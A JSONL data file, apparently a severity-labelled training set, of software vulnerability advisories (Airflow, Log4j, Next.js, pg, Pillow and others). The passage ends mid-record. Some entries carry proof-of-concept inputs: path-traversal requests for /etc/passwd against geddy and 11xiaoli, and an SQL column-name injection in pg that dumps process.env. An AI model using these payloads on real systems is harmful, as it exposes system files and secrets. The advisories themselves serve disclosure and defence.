-{"id": "6a7f30df27a2570ae6ce", "text": "Apache Airflow vulnerable to CSRF Attacks\n\nA number of HTTP endpoints in the Airflow webserver (both RBAC and classic) did not have adequate protection and were vulnerable to cross-site request forgery attacks.", "text_raw": "Apache Airflow vulnerable to CSRF Attacks\n\n[Severity: HIGH]\n\nA number of HTTP endpoints in the Airflow webserver (both RBAC and classic) did not have adequate protection and were vulnerable to cross-site request forgery attacks.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-18", "split": "train"} -{"id": "49ea1918a29b71dbc0b0", "text": "Malicious Package in asnc\n\nAll versions of `asnc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "text_raw": "Malicious Package in asnc\n\n[Severity: CRITICAL]\n\nAll versions of `asnc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "221923473c7fc29eecd1", "text": "XSS in Image Optimization API for Next.js\n\n### Impact\n- **Affected:** All of the following must be true to be affected\n - Next.js between version 10.0.0 and 11.1.0\n - The `next.config.js` file has [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) array assigned\n - The image host assigned in [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) allows user-provided SVG\n- **Not affected**: The `next.config.js` file has [`images.loader`](https://nextjs.org/docs/basic-features/image-optimization#loader) assigned to something other than default\n- **Not affected**: Deployments on [Vercel](https://vercel.com) are not affected\n\n### Patches\n[Next.js v11.1.1](https://github.com/vercel/next.js/releases/tag/v11.1.1)", "text_raw": "XSS in Image Optimization API for Next.js\n\n[Severity: HIGH]\n\n### Impact\n- **Affected:** All of the following must be true to be affected\n - Next.js between version 10.0.0 and 11.1.0\n - The `next.config.js` file has [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) array assigned\n - The image host assigned in [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) allows user-provided SVG\n- **Not affected**: The `next.config.js` file has [`images.loader`](https://nextjs.org/docs/basic-features/image-optimization#loader) assigned to something other than default\n- **Not affected**: Deployments on [Vercel](https://vercel.com) are not affected\n\n### Patches\n[Next.js v11.1.1](https://github.com/vercel/next.js/releases/tag/v11.1.1)\n\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-01", "split": "train"} -{"id": "a41ab27080a67c0d7b67", "text": "Anviz AIM CrossChex Standard 4.3 Excel Macro Injection", "text_raw": "Anviz AIM CrossChex Standard 4.3 Excel Macro Injection\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-11-01", "split": "train"} -{"id": "bc2c1e74163fcb5b6fb7", "text": "Command injection in eslint-fixer\n\nThe eslint-fixer package through 0.1.5 for Node.js allows command injection via shell metacharacters to the fix function. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. The ozum/eslint-fixer GitHub repository has been intentionally deleted.", "text_raw": "Command injection in eslint-fixer\n\n[Severity: CRITICAL]\n\nThe eslint-fixer package through 0.1.5 for Node.js allows command injection via shell metacharacters to the fix function. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. The ozum/eslint-fixer GitHub repository has been intentionally deleted.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-13", "split": "train"} -{"id": "0cb4be56c4fbb032bc60", "text": "Pillow Out-of-bounds Write\n\nIn Pillow before 8.1.0, TiffDecode has a heap-based buffer overflow when decoding crafted YCbCr files because of certain interpretation conflicts with LibTIFF in RGBA mode.", "text_raw": "Pillow Out-of-bounds Write\n\n[Severity: HIGH]\n\nIn Pillow before 8.1.0, TiffDecode has a heap-based buffer overflow when decoding crafted YCbCr files because of certain interpretation conflicts with LibTIFF in RGBA mode.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-18", "split": "train"} -{"id": "fdf873f4e14638a3577c", "text": "Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF", "text_raw": "Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2019-12-09", "split": "train"} -{"id": "ec1fe26a5cb44b3ff032", "text": "Uncontrolled recursion leads to abort in deserialization\n\nAffected versions of this crate did not properly check for recursion while deserializing aliases. This allows an attacker to make a YAML file with an alias referring to itself causing an abort. The flaw was corrected by checking the recursion depth.", "text_raw": "Uncontrolled recursion leads to abort in deserialization\n\n[Severity: MEDIUM]\n\nAffected versions of this crate did not properly check for recursion while deserializing aliases. This allows an attacker to make a YAML file with an alias referring to itself causing an abort. The flaw was corrected by checking the recursion depth.\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "292f39bd7d461dfea2d2", "text": "Directory Traversal in geddy\n\nVersions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.\n\n### Proof of Concept\n```\nhttp://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\n```\n\n## Recommendation\n\nUpdate geddy to version >= 13.0.8", "text_raw": "Directory Traversal in geddy\n\n[Severity: HIGH]\n\nVersions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.\n\n### Proof of Concept\n```\nhttp://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\n```\n\n\n## Recommendation\n\nUpdate geddy to version >= 13.0.8", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "724f032747df469fc26f", "text": "Wordpress Securimage-WP Plugin v3.2.4 URI-based XSS Vulnerability", "text_raw": "Wordpress Securimage-WP Plugin v3.2.4 URI-based XSS Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2013-05-11", "split": "train"} -{"id": "601abdecfcfb5d4440c1", "text": "Storage corruption due to variables overwritten by re-entrancy locks\n\n### Background\nWhen attempting to use the v0.2.14 release, @pandadefi discovered an issue using the `@nonreentrant` decorator.\n\n### Impact\nReentrancy protection storage slots get allocated to the same slots as storage variables, leading to the corruption of storage variables when using the `@nonreentrant` decorator.\n\n### Patches\nThis issue was fixed in v0.2.15 in #2391, #2379\n\n### Workarounds\nDon't use the `@nonreentrant` decorator in these versions.", "text_raw": "Storage corruption due to variables overwritten by re-entrancy locks\n\n[Severity: HIGH]\n\n### Background\nWhen attempting to use the v0.2.14 release, @pandadefi discovered an issue using the `@nonreentrant` decorator.\n\n### Impact\nReentrancy protection storage slots get allocated to the same slots as storage variables, leading to the corruption of storage variables when using the `@nonreentrant` decorator.\n\n### Patches\nThis issue was fixed in v0.2.15 in #2391, #2379\n\n### Workarounds\nDon't use the `@nonreentrant` decorator in these versions.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-05", "split": "train"} -{"id": "79f89e10909da18838c5", "text": "Uncontrolled Resource Consumption in MetadataExtractor\n\nMetadataExtractor 2.1.0 allows stack consumption.", "text_raw": "Uncontrolled Resource Consumption in MetadataExtractor\n\n[Severity: HIGH]\n\nMetadataExtractor 2.1.0 allows stack consumption.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-08-23", "split": "train"} -{"id": "0acb2c3f8d9d3dc66b87", "text": "Directory Traversal in 11xiaoli\n\nAffected versions of `11xiaoli` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in 11xiaoli\n\n[Severity: HIGH]\n\nAffected versions of `11xiaoli` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "967de9ef79b480c69861", "text": "Apple iOS, iPadOS, and watchOS Memory Corruption Vulnerability\n\nAffected: Apple iOS, iPadOS, and watchOS\n\nApple iOS, iPadOS, and watchOS Mail contains a memory corruption vulnerability that may allow heap corruption when processing a maliciously crafted mail message.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apple iOS, iPadOS, and watchOS Memory Corruption Vulnerability\n\nAffected: Apple iOS, iPadOS, and watchOS\n\nApple iOS, iPadOS, and watchOS Mail contains a memory corruption vulnerability that may allow heap corruption when processing a maliciously crafted mail message.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "1e8afd92b5ee86dac04c", "text": "DNN (aka DotNetNuke) has Remote Code Execution via a cookie\n\nDNN (aka DotNetNuke) before 9.1.1 has Remote Code Execution via a cookie, aka \"2017-08 (Critical) Possible remote code execution on DNN sites.\"", "text_raw": "DNN (aka DotNetNuke) has Remote Code Execution via a cookie\n\n[Severity: HIGH]\n\nDNN (aka DotNetNuke) before 9.1.1 has Remote Code Execution via a cookie, aka \"2017-08 (Critical) Possible remote code execution on DNN sites.\"", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-16", "split": "train"} -{"id": "3503f1c3673b9083f3ba", "text": "Potential to access user credentials from the log files when debug logging enabled\n\nA flaw was found in, all under 2.0.20, in the Undertow DEBUG log for io.undertow.request.security. If enabled, an attacker could abuse this flaw to obtain the user's credentials from the log files.", "text_raw": "Potential to access user credentials from the log files when debug logging enabled\n\n[Severity: CRITICAL]\n\nA flaw was found in, all under 2.0.20, in the Undertow DEBUG log for io.undertow.request.security. If enabled, an attacker could abuse this flaw to obtain the user's credentials from the log files.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-11-20", "split": "train"} -{"id": "1584f3b86a046e626665", "text": "bookstack is vulnerable to Improper Access Control\n\nbookstack is vulnerable to Improper Access Control.", "text_raw": "bookstack is vulnerable to Improper Access Control\n\n[Severity: MEDIUM]\n\nbookstack is vulnerable to Improper Access Control.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-01", "split": "train"} -{"id": "7bbeafb56e928785e8e0", "text": "Incomplete fix for Apache Log4j vulnerability\n\n# Impact\n\nThe fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.\n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\n# Mitigation\n\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n\nLog4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability.", "text_raw": "Incomplete fix for Apache Log4j vulnerability\n\n[Severity: CRITICAL]\n\n# Impact\n\nThe fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack. \n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\n# Mitigation\n\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n\nLog4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-12-14", "split": "train"} -{"id": "4c2c7a90642a5d28756b", "text": "Jinja2 sandbox escape via string formatting\n\nIn Pallets Jinja before 2.10.1, `str.format_map` allows a sandbox escape.\n\nThe sandbox is used to restrict what code can be evaluated when rendering untrusted, user-provided templates. Due to the way string formatting works in Python, the `str.format_map` method could be used to escape the sandbox.\n\nThis issue was previously addressed for the `str.format` method in Jinja 2.8.1, which discusses the issue in detail. However, the less-common `str.format_map` method was overlooked. This release applies the same sandboxing to both methods.\n\nIf you cannot upgrade Jinja, you can override the `is_safe_attribute` method on the sandbox and explicitly disallow the `format_map` method on string objects.", "text_raw": "Jinja2 sandbox escape via string formatting\n\n[Severity: HIGH]\n\nIn Pallets Jinja before 2.10.1, `str.format_map` allows a sandbox escape.\n\nThe sandbox is used to restrict what code can be evaluated when rendering untrusted, user-provided templates. Due to the way string formatting works in Python, the `str.format_map` method could be used to escape the sandbox.\n\nThis issue was previously addressed for the `str.format` method in Jinja 2.8.1, which discusses the issue in detail. However, the less-common `str.format_map` method was overlooked. This release applies the same sandboxing to both methods.\n\nIf you cannot upgrade Jinja, you can override the `is_safe_attribute` method on the sandbox and explicitly disallow the `format_map` method on string objects.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-10", "split": "train"} -{"id": "0b49fdf241e5a6fb4178", "text": "**Withdrawn:** Duplicate of GHSA-79mx-88w7-8f7q", "text_raw": "Moderate severity vulnerability that affects validator\n\n[Severity: MEDIUM]\n\n**Withdrawn:** Duplicate of GHSA-79mx-88w7-8f7q", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "47985b1a51b4036ce0ad", "text": "Unsafe HTTP Redirect in Puppet Agent and Puppet Server\n\nA flaw was discovered in Puppet Agent and Puppet Server that may result in a leak of HTTP credentials when following HTTP redirects to a different host. This is similar to CVE-2018-1000007", "text_raw": "Unsafe HTTP Redirect in Puppet Agent and Puppet Server\n\n[Severity: MEDIUM]\n\nA flaw was discovered in Puppet Agent and Puppet Server that may result in a leak of HTTP credentials when following HTTP redirects to a different host. This is similar to CVE-2018-1000007", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-02", "split": "train"} -{"id": "1c3e0a1d6cc8c202af57", "text": "Cross-Site Scripting in swagger-ui\n\nAffected versions of `swagger-ui` contain a cross-site scripting vulnerability in the key names of a specific nested object in the JSON document.\n\n## Proof of Concept\nThe vulnerable object structure is:\n```\n{\n \"definitions\": {\n \"arbitraryVal\": {\n \"properties\": {\n \"\": \"LoremIpsum\"\n }\n }\n }\n}\n```\nMalicious JSON documents can be loaded in by providing a URL to them in the `url` query string parameter.\n\n## Recommendation\n\nUpdate to version 2.2.1 or later.", "text_raw": "Cross-Site Scripting in swagger-ui\n\n[Severity: CRITICAL]\n\nAffected versions of `swagger-ui` contain a cross-site scripting vulnerability in the key names of a specific nested object in the JSON document.\n\n\n## Proof of Concept\nThe vulnerable object structure is:\n```\n{\n \"definitions\": {\n \"arbitraryVal\": {\n \"properties\": {\n \"\": \"LoremIpsum\"\n }\n }\n }\n}\n```\nMalicious JSON documents can be loaded in by providing a URL to them in the `url` query string parameter.\n\n\n\n## Recommendation\n\nUpdate to version 2.2.1 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "059d594cf8cd9e6b5a79", "text": "Cross-Site Scripting in seeftl\n\nAll versions of `seeftl` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "text_raw": "Cross-Site Scripting in seeftl\n\n[Severity: HIGH]\n\nAll versions of `seeftl` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-04-01", "split": "train"} -{"id": "b7b30eb95ec3ce6ba6a8", "text": "Duplicate Advisory: Path Traversal in Zope\n\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-5pr9-v234-jw36. This link is maintained to preserve external references.\n\n## Original Description\nZope is an open-source web application server. This advisory extends the previous advisory at https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36 with additional cases of TAL expression traversal vulnerabilities. Most Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use. By default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk. The problem has been fixed in Zope 5.2.1 and 4.6.1. The workaround is the same as for https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36: A site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.", "text_raw": "Duplicate Advisory: Path Traversal in Zope\n\n[Severity: HIGH]\n\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-5pr9-v234-jw36. This link is maintained to preserve external references.\n\n## Original Description\nZope is an open-source web application server. This advisory extends the previous advisory at https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36 with additional cases of TAL expression traversal vulnerabilities. Most Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use. By default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk. The problem has been fixed in Zope 5.2.1 and 4.6.1. The workaround is the same as for https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36: A site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-10", "split": "train"} -{"id": "51507a65dc2d3d2d4479", "text": "Remote Code Execution in pg\n\nAffected versions of `pg` contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.\n\nThere are two specific scenarios in which it is likely for an application to be vulnerable:\n1. The application executes unsafe, user-supplied sql which contains malicious column names.\n2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.\n\n## Proof of Concept\n```\nconst { Client } = require('pg')\nconst client = new Client()\nclient.connect()\n\nconst sql = `SELECT 1 AS \"\\\\'/*\", 2 AS \"\\\\'*/\\n + console.log(process.env)] = null;\\n//\"`\n\nclient.query(sql, (err, res) => {\n client.end()\n})\n```\n\n## Recommendation\n\n* Version 2.x.x: Update to version 2.11.2 or later.\n* Version 3.x.x: Update to version 3.6.4 or later.\n* Version 4.x.x: Update to version 4.5.7 or later.\n* Version 5.x.x: Update to version 5.2.1 or later.\n* Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )\n* Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )", "text_raw": "Remote Code Execution in pg\n\n[Severity: CRITICAL]\n\nAffected versions of `pg` contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name. \n\nThere are two specific scenarios in which it is likely for an application to be vulnerable:\n1. The application executes unsafe, user-supplied sql which contains malicious column names.\n2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.\n\n## Proof of Concept\n```\nconst { Client } = require('pg')\nconst client = new Client()\nclient.connect()\n\nconst sql = `SELECT 1 AS \"\\\\'/*\", 2 AS \"\\\\'*/\\n + console.log(process.env)] = null;\\n//\"`\n\nclient.query(sql, (err, res) => {\n client.end()\n})\n```\n\n\n## Recommendation\n\n* Version 2.x.x: Update to version 2.11.2 or later.\n* Version 3.x.x: Update to version 3.6.4 or later.\n* Version 4.x.x: Update to version 4.5.7 or later.\n* Version 5.x.x: Update to version 5.2.1 or later.\n* Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )\n* Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-07-24", "split": "train"} -{"id": "495b1fc189136664eea6", "text": "OWASP AntiSamy vulnerable to Cross-site Scripting\n\nIn OWASP AntiSamy before 1.5.5, by submitting a specially crafted input (a tag that supports style with active content), you could bypass the library protections and supply executable code. The impact is XSS.", "text_raw": "OWASP AntiSamy vulnerable to Cross-site Scripting\n\n[Severity: MEDIUM]\n\nIn OWASP AntiSamy before 1.5.5, by submitting a specially crafted input (a tag that supports style with active content), you could bypass the library protections and supply executable code. The impact is XSS.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-18", "split": "train"} -{"id": "abda251c309fd23bfb08", "text": "Cross site scripting in the system log\n\n### Impact\n\nIt is possible to inject code into the `tl_log` table that will be executed in the browser when the system log is called in the back end.\n\n### Patches\n\nUpdate to Contao 4.9.16 or 4.11.5.\n\n### Workarounds\n\nDisable the system log module in the back end for all users (especially admin users).\n\n### References\n\nhttps://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", "text_raw": "Cross site scripting in the system log\n\n[Severity: MEDIUM]\n\n### Impact\n\nIt is possible to inject code into the `tl_log` table that will be executed in the browser when the system log is called in the back end.\n\n### Patches\n\nUpdate to Contao 4.9.16 or 4.11.5.\n\n### Workarounds\n\nDisable the system log module in the back end for all users (especially admin users).\n\n### References\n\nhttps://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-01", "split": "train"} -{"id": "08de74bc8ca76d5c1389", "text": "CoAPthon DoS due to Exceptions\n\nThe `Serialize.deserialize()` method in CoAPthon 3.1, 4.0.0, 4.0.1, and 4.0.2 mishandles certain exceptions, leading to a denial of service in applications that use this library (e.g., the standard CoAP server, CoAP client, CoAP reverse proxy, example collect CoAP server and client) when they receive crafted CoAP messages.", "text_raw": "CoAPthon DoS due to Exceptions\n\n[Severity: HIGH]\n\nThe `Serialize.deserialize()` method in CoAPthon 3.1, 4.0.0, 4.0.1, and 4.0.2 mishandles certain exceptions, leading to a denial of service in applications that use this library (e.g., the standard CoAP server, CoAP client, CoAP reverse proxy, example collect CoAP server and client) when they receive crafted CoAP messages.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-08", "split": "train"} -{"id": "836c8806b126e6f45fde", "text": "Out-of-bounds Write in Pillow\n\nAn issue was discovered in Pillow before 8.1.1. In TiffDecode.c, there is a negative-offset memcpy with an invalid size.", "text_raw": "Out-of-bounds Write in Pillow\n\n[Severity: HIGH]\n\nAn issue was discovered in Pillow before 8.1.1. In TiffDecode.c, there is a negative-offset memcpy with an invalid size.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-29", "split": "train"} -{"id": "681de0422ed55507933d", "text": "HTTP Request Smuggling in netius\n\nnetius prior to 1.17.58 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Transfer encoding header parsing which could allow for CL:TE or TE:TE attacks.", "text_raw": "HTTP Request Smuggling in netius\n\n[Severity: MEDIUM]\n\nnetius prior to 1.17.58 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Transfer encoding header parsing which could allow for CL:TE or TE:TE attacks.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-18", "split": "train"} -{"id": "5371984e726e09e0144e", "text": "SOYAL Biometric Access Control System 5.0 Weak Default Credentials", "text_raw": "SOYAL Biometric Access Control System 5.0 Weak Default Credentials\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2021-03-18", "split": "train"} -{"id": "5b9ff470dcd919608c3f", "text": "Prototype Pollution in deep-get-set\n\nAll versions of package deep-get-set prior to version 1.1.1 are vulnerable to Prototype Pollution via the main function.", "text_raw": "Prototype Pollution in deep-get-set\n\n[Severity: HIGH]\n\nAll versions of package deep-get-set prior to version 1.1.1 are vulnerable to Prototype Pollution via the main function.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "87cf726f393c11d2336f", "text": "Improper Authentication in Apache Shiro\n\nApache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.", "text_raw": "Improper Authentication in Apache Shiro\n\n[Severity: CRITICAL]\n\nApache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-07", "split": "train"} -{"id": "757ae8b220afedbd98c5", "text": "Exposure of Sensitive Information to an Unauthorized Actor in activestorage\n\nA bypass vulnerability in Active Storage >= 5.2.0 for Google Cloud Storage and Disk services allow an attacker to modify the `content-disposition` and `content-type` parameters which can be used in with HTML files and have them executed inline. Additionally, if combined with other techniques such as cookie bombing and specially crafted AppCache manifests, an attacker can gain access to private signed URLs within a specific storage path.\n\nVulnerable apps are those using either GCS or the Disk service in production. Other storage services such as S3 or Azure aren't affected.", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor in activestorage\n\n[Severity: MEDIUM]\n\nA bypass vulnerability in Active Storage >= 5.2.0 for Google Cloud Storage and Disk services allow an attacker to modify the `content-disposition` and `content-type` parameters which can be used in with HTML files and have them executed inline. Additionally, if combined with other techniques such as cookie bombing and specially crafted AppCache manifests, an attacker can gain access to private signed URLs within a specific storage path.\n\nVulnerable apps are those using either GCS or the Disk service in production. Other storage services such as S3 or Azure aren't affected.\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-12-05", "split": "train"} -{"id": "78d936ee53434407d21e", "text": "Unsafe object creation in json RubyGem\n\nThe JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269/GHSA-x457-cw4h-hq5f, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.", "text_raw": "Unsafe object creation in json RubyGem\n\n[Severity: HIGH]\n\nThe JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269/GHSA-x457-cw4h-hq5f, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-07-27", "split": "train"} -{"id": "0265306d06b6266aa1d6", "text": "Apache Ozone exposes OM, SCM and Datanode metadata\n\nIn Apache Ozone before 1.2.0, Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.", "text_raw": "Apache Ozone exposes OM, SCM and Datanode metadata\n\n[Severity: MEDIUM]\n\nIn Apache Ozone before 1.2.0, Recon HTTP endpoints provide access to OM, SCM and 